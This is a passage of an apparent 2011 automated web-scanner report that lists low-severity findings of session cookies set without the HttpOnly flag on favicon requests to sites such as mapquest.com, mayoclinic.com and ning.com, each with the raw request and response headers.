The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: JSESSIONID=CD6A173FEB5068E709E2FABC3BE58FCC; Path=/
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Expires: Sat, 09 Jul 2011 23:30:33 GMT
Cache-Control: max-age=8640000
ETag: W/"16958-1301007108000"
Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT
Content-Type: image/x-icon;charset=UTF-8
Content-Language: en-US
Content-Length: 16958
Date: Sat, 02 Apr 2011 13:30:54 GMT

......@@.... .(B......(...@......... .......................................................R..........................................................................................................
...[SNIP]...
14.14. http://www.livevideo.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.livevideo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livevideo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=q58e2q8qs5alfuj8eu827ing04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Retry-After: 7200
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25139


<font face=arial size=2>
<table border=0 cellspacing=0 cellpadding=0 width=750 align=center><tr><td>
<center><br><img src="/live-video.gif"><br><br>

<table border=0 cellspacing=0 cellpadding=20 widt
...[SNIP]...
14.15. http://www.lowermybills.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lowermybills.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lowermybills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:58 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751118181699; path=/; expires=Mon, 01-Apr-13 13:31:58 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=FAF1E3B29C91E2801A839A985201BC0F; Path=/
ETag: W/"1718-1301524843000"
Last-Modified: Wed, 30 Mar 2011 22:40:43 GMT
Content-Length: 1718
Content-Type: image/x-icon
Set-Cookie: BIGipServerpl.lmbprod=553918474.20480.0000; path=/

..............(...&...........h...N...(....... ................................................................................................"""""" '......r/......./....././...."./....#.2/..."7."/.
...[SNIP]...
14.16. http://www.lyrics.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lyrics.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyrics.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:50:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fje8lglg3q0b5svml55m2bm093; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e222da316628da66fe8b4cbb3db9d0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22curl%2F7.21.0+%28amd64-pc-win32%29+libcurl%2F7.21.0+OpenSS%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1301752227%3B%7Ddd43b442b56ab4c5e5cf1d43e467e42a; expires=Sat, 02-Apr-2011 15:50:27 GMT; path=/
Location: http://www.lyrics.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: session_id=218759434.20480.0000; path=/

14.17. http://www.mapquest.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mapquest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="JLUHhthGQfnS1TgXuuJQmiORiO8="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:30 GMT; Path=/
Set-Cookie: psession="UdOt/zUW/PqyIT51eoLXfzOifpQ="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:30 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1150-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: image/x-icon
Content-Length: 1150
Date: Sat, 02 Apr 2011 12:37:30 GMT

............ .h.......(....... ..... .............................?...?...?...?...?...?...?...?...?...?...?...?...?...?.......?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.
...[SNIP]...
14.18. http://www.mayoclinic.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:24:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=5216401;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: CFTOKEN=31014280;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: JSESSIONID=b230124a654d7a3c162276d7e9525c59751d;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...
14.19. http://www.medicinenet.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.medicinenet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicinenet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: /images/fav/mn.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDACQTQCAC=GGLFPLPCCDPBLPPOFKPMKAKH; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:24:22 GMT

14.20. http://www.mrmovietimes.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mrmovietimes.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrmovietimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: ci_session=Pxo%2Fmkc72zw34uGdKefBnTKWnI38vNFuRHZJuWHotgoLiVrWO%2FyS899sVleGDTCa2378J5LwcCx%2FaM3Iu6M9HYM1xNRYhzFD8lxZ46O%2FJ3nwd%2Bvpqrqxx8ftRXSPpmIZDPqJkuft4RfzDbKrA3W82BkFflF8ybcM%2FTTixeL%2Fm%2BrTiDc1eW64DbHWf7ZnUmfNoFYMH%2BNTVkfhzkAj2mnYk68GgXolGs5rItNsbvL1XJxkWq%2FGEKnjXX56nfFb6lHe9BXx0QjVxoyJwfdyq3S0xD7ZfsUzCE4qQl274NwudSsM4sTm5AG5seWG0rEVYqrOX%2BCvbs2RFaiYsOIBYd2tnOcF97iCBmuNqYstGLS9GEo40ZwueXnzLFJSNDQcN3ISMGspPD5cP4Kfiwg7241ktJS%2FoTY4QjL2IHI7fkO0V%2BwELgecc8ERNofDzFzXSuRysvQFytx2y9uu%2BDIejUxyv%2FE6%2B2F4WOFRzPCZHSAXt%2B63j%2FCewbA0HsBZEss7%2F6Xa1IUqt2VF7NLwawkOAm3xJ4j1%2FQPUWHVYJBcl%2BNiisNRgBE%2FLifcI4vGUK6XJbMHrKlkEqCc0Zl%2BJhc1sxp%2FFyKjXbYkb9chz3mP7lmJZHvX8ocsN%2F7Bxrkppf9uyWGrz; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Set-Cookie: locationData=O%3A8%3A%22stdClass%22%3A7%3A%7Bs%3A8%3A%22distance%22%3Bs%3A2%3A%2210%22%3Bs%3A4%3A%22city%22%3BN%3Bs%3A6%3A%22region%22%3BN%3Bs%3A12%3A%22country_code%22%3Bs%3A2%3A%22US%22%3Bs%3A8%3A%22latitude%22%3BN%3Bs%3A9%3A%22longitude%22%3BN%3Bs%3A11%3A%22postal_code%22%3Bs%3A0%3A%22%22%3B%7D; expires=Tue, 30-Mar-2021 14:00:53 GMT; path=/; domain=www.mrmovietimes.com
Set-Cookie: ci_session=BzKboyaJvMSktBeg3pLApmo%2BFi1zrsIVFwSxCPNsxsvMPhZVvVzgu9X6lsdhW6alBUOEFALoOzSWv1gnDLoPPwFI8HHbpddijnLl0f9V1hlJB8y3IxU21tCjPeSPQG4tJ0glFKgdxfty3Sw%2BTMl07BrDpKmlRLjs1cUDtYV%2Bec5pujiLNDKpgdo%2BfD2U2gAxqEntoeEWVNmKXJTJMkeTMjPmZEb7Cw0YHMzACi%2BEZWp7TeahJchMLtAUWr%2BKXhf%2BtfUPpz1Zl%2BvAiNYrsUsMQ1EZHpnW%2BAxq%2BiKZrw7W6014Qrk3yEakON6A445N3w%2FjQNi%2Bbml48X%2B9qkmm1vxaP7pUVZvbL1IUxldnQeCL7CNQqnTyo%2FTCzfnwzEMxkdeK85JfLbLluvLqfhB%2BhLSwhGjVuEMU1KteyLvEmkqPno%2Fht0BU%2FMBs3lVRhJIY5ac2N97zssEY8yACf1CangjgtXAa2KJxkoMFNA079kwj6cJYhCno20FBv8NJ2tdQu36LPzEO1Ye3WsfXedxcQrqIJV6JDwo%2FdsGpuRlqivbBcNLy3tqknO6QATPXaUddfy1calDlp4VxbPYokP0tqreyJiqpDZYuB6Wucxq02VGZKUz2k%2B4e5w2oIZMZxtGt%2B6lpV4OXoVCifK9YpMBxZi0fYe8kIjqT%2B0LFHAr8lxofuhJGCYVDne7%2FrH908Z5Zt%2FeNetYGgoWgTeZlX9d8QPfFwIl99hPNAFlJono6Rio3H4Bi%2FcoKpFcI7foxh4o%2B5Wd2WYvc%2Bfnnhy9cptgpTSQKztlFTaxP%2FREWWwmdhUEijT0JtxX7UrQMKXwG2k3LhiZTgTH6bNpVpkqSSFK3Og1NA2pDRoDXMhTdFsLIj08ox%2BXj88zSIhMZ5fWKKoPH%2FyqWPJlJyugj3x54W3ptgasZZB7ZdGnVfuakUJnYGKrXlTYLkF5suXHLaKMqXqvdzQwH8xMwhxSVIVhkHodESV0ZyGWaWTrrCtyNp2TvVeJXZdQt8J8Noyf4ZnaYHXAqBtAHF%2Fj2U0RwwfkHcUu3M85m6sWhfp4XNaFIZ6Qz%2Fg1Ij%2BRj9bdLXlnzV4u7EZgiVRDWMKGZdW5DbqbcuP4E7LNoRUzrVMKfwDc%2FU6KJLb3C8FI4ssXohIT4LUHPb7xEE9bS; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10698

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

...[SNIP]...
14.21. http://www.musiciansfriend.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musiciansfriend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 15 Jan 2010 23:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=269732
Expires: Tue, 05 Apr 2011 16:35:34 GMT
Date: Sat, 02 Apr 2011 13:40:02 GMT
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003227974d69c20a00849f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003227974d69c20a00859f0000; expires=Sun, 06-Mar-2016 13:40:02 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003227974d69c20a00869f0000; expires=Thu, 07-Apr-2011 13:40:02 GMT; path=/; domain=musiciansfriend.com

..............h.......(....... ...................................T...W.....W."?x.....;...p...[}..;.......0i..^...cf..S...-W...7o.AV....V.y...6As.8q...9r.,^..........X...?Fv.,O..Z...\...3q..m...Y.....
...[SNIP]...
14.22. http://www.ncnetwork.net/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ncnetwork.net
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ncnetwork.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3482
Content-Type: text/html
Cache-Control: private
Date: Sat, 02 Apr 2011 13:51:31 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQABAS=GKFAHGGDKFNDLNDPCGJKGAAA; path=/
Set-Cookie: NSC_xxxod_tqmbu_mcw=ffffffff934e331545525d5f4f58455e445a4a423660;path=/

<!-- Vignette V6 Fri Dec 08 08:18:42 2006 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Verizon</title>
<meta http-equiv="content-type" content="text/ht
...[SNIP]...
14.23. http://www.ning.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-XN-Trace-Token: 9f9c1c9c-5fa1-4bab-8993-14577ccb4134
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=c5369740-b729-45ac-ba3a-bbb4c515e644;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:24:47 GMT
Set-Cookie: ning_session="nAHWdTfdOjMut3QNynKqxXypQ/m+CjPKz2Xk0bPPyn9b46CDeXF+vx+gkz8Znwi2UfKCwpXcPW8=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:24:47 GMT
XN-ResponseFrom: 10.16.33.64,(10.16.106.52,200,6)
Date: Sat, 02 Apr 2011 13:24:47 GMT
Last-Modified: Thu, 31 Mar 2011 23:15:59 GMT
ETag: "408973-57e-49fcf79e5e9c0"
Accept-Ranges: bytes
Content-Type: image/x-icon
Cache-Control: max-age=0
Content-Length: 1406

..............h.......(....... ...............................~...O.~.........[...C.u.....................r.............................................................................................
...[SNIP]...
14.24. http://www.popularscreensavers.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
Set-Cookie: JSESSIONID=9447E9A291E9E0B405C9506EB438405A; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 100956


                                                                                                                           
...[SNIP]...
14.25. http://www.prioritymail.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.prioritymail.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prioritymail.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Date: Sat, 02 Apr 2011 13:39:12 GMT
X-Powered-By: ASP.NET
X-Node: 1
Location: https://www.prioritymail.com/favicon.ico
Content-Length: 161
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQCACQDA=GFBLJJGCABNDGCLDNCJLJFPE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.prioritymail.com/favicon.ico">here</a>.</body>
14.26. http://www.pronto.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pronto.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:43 GMT
Server: Apache/2.2.4 (Fedora)
Set-Cookie: JSESSIONID=612608DD194E2650C96F7544861E8212; Path=/
Set-Cookie: SESSIONID=1390698434; Domain=.pronto.com; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Domain=.pronto.com; Expires=Mon, 02-May-2011 13:23:43 GMT; Path=/
Set-Cookie: M_ID=-4f77939a-12f1647631d-28ef; Domain=.pronto.com; Expires=Mon, 01-Apr-2013 13:23:43 GMT; Path=/
Set-Cookie: V_ID=-4f77939a-12f1647631d-28f0; Domain=.pronto.com; Path=/
ETag: W/"1150-1273607942000"
Last-Modified: Tue, 11 May 2010 19:59:02 GMT
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Via: CN-5000
Proxy-Connection: Keep-Alive

............ .h.......(....... ..... .....@.............................................`3..........................................................b...[...[6..........................................
...[SNIP]...
14.27. http://www.questia.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.questia.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.questia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:36 GMT
Set-Cookie: JSESSIONID=7CE247DEB992324E4E0F4C6DBC0D4DDC.inst3_1b; Path=/
Set-Cookie: QVID=684848763; Expires=Thu, 20-Apr-2079 17:29:43 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1406-1300281637000"
Last-Modified: Wed, 16 Mar 2011 13:20:37 GMT
Content-Length: 1406
Content-Type: image/x-icon

..............h.......(....... ...........@................................................}..ca..JM..J<..10..!.........................................................................................
...[SNIP]...
14.28. http://www.rxlist.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.rxlist.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rxlist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: /images/fav/rx.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAASRTCCD=JHIMJMPCINKGIBOENJHHMCBE; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:37:18 GMT

14.29. http://www.softonic.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.softonic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.softonic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Expires: Thu, 07 Apr 2011 19:10:17 GMT
Cache-Control: max-age=451872, public
Last-Modified: Thu, 31 Mar 2011 19:10:17 GMT
ETag: "7cb651b31ce3c119df9a7081244f7ee6"
Set-Cookie: softonic_es-admin=deleted; expires=Fri, 02-Apr-2010 13:39:04 GMT; path=/; domain=softonic.com
Set-Cookie: PHPSESSID=2e29be89a8385992f825d6f55520437d; path=/; domain=softonic.com
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: image/x-icon

............ .h.......(....... ..... ...................................9c..........................................,u.o............LT.v...t....M...........................C..q...r....5i.....o....%..o
...[SNIP]...
14.30. http://www.suntimes.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.suntimes.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suntimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:37:44 GMT
Server: Apache/2.2.3 (Red Hat)
set-cookie: CSPSESSIONID-SP-80-UP-=000000010000487voeTq000000unSIZmK6gJ43n8m0PT_7Iw--; path=/;
cache-control: no-cache
expires: Thu, 29 Oct 1998 17:04:19 GMT
pragma: no-cache
csp-transfer-encoding: chunked
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: SUNT=SUNT_ECP9; path=/
Content-Length: 127640


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" x
...[SNIP]...
14.31. http://www.thegrids.info/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thegrids.info
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegrids.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:05:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=ckguqfdilu9pmnj7sfqargiqc0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 372
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
</head>
<body>

<div id="header-error">Error</div>

<div class="login-e
...[SNIP]...
14.32. http://www.thisis50.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thisis50.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thisis50.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:19 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=72496530-32a2-4001-aeeb-9a7e9872eab2;Path=/;Domain=.thisis50.com;Expires=Tue, 30-Mar-21 14:10:19 GMT
